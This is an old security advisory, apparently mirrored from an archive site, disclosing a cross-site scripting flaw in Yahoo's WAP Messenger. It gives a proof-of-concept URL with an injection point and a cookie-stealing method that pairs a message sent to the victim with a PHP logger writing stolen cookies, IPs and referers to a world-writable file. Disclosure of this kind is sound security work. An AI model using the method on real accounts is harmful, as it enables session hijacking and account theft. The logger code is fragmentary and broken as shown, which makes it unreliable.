AOH :: HP Unsorted W :: B06-4801.HTM

WAP Y! Messenger Cross-Site Scripting Vulnerability



WAP Y! Messenger Cross-Site Scripting Vulnerability
WAP Y! Messenger Cross-Site Scripting Vulnerability



ECHO_ADV_47$2006

------------------------------------------------------------------------------
[ECHO_ADV_47$2006] WAP Y! Messenger Cross-Site Scripting Vulnerability
------------------------------------------------------------------------------

Author          : Dedi Dwianto
Date Found      : Sep, 14th 2006
Location        : Indonesia, Jakarta
web             : http://advisories.echo.or.id/adv/adv47-theday-2006.txt
Critical Lvl    : Medium Critical
Impact          : Cross Site Scripting
Where           : From Remote
---------------------------------------------------------------------------

Affected Yahoo Service description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Wireless Application Protocol or WAP is an open international standard for applications thatuse wireless communication.
Its principal application is to enable access to the internet from a mobile phone or PDA.
Yahoo! Have wap site which provide mobile services such as messenger,mail and news via
mobile phone or PDA.

Service         : Y! Messenger
URL             : http://mm.yahoo.com/

---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~~
Y! Wap messenger allow user can execute the HTML code if message want to save.

Proof Of Concept:
~~~~~~~~~~~~~~~
[1] Open and login with wap browser ,
url : http://mm.yahoo.com
[2] Goto :
http://mm.yahoo.com/xhtml?k=[id]&u=[your_nick]&s=[your session]&m=[your_nick]_dummymin&c=707&p=&d=[your_friend_id]*[your_nick]*[random number]*[XSS HERE]

Attacker Stealting Cookie for get Account :
[1] Send message to victim with connected via mobile/wap .
    message :
    ----begin----
    Hello , please save my message :)

    ----end -----

    ----get_cookie.php----
     IP: ' .$ip. '
Date and Time: ' .$date. '
Referer: '.$referer.'



'); fclose($fp); ?> ----end ----- change permission file cookies.txt to 777 Solution: ~~~~~~~ - Don't Save any message with html code :). --------------------------------------------------------------------------- Shoutz: ~~~ ~ y3dips,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous ~ az001,boom3x,mathdule,angelia ~
newbie_hacker@yahoogroups.com ~ #aikmel - #e-c-h-o @irc.dal.net ------------------------------------------------------------------------ --- Contact: ~~~~ EcHo Research & Development Center the_day[at]echo[dot]or[dot]id -------------------------------- [ EOF ]----------------------------------

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.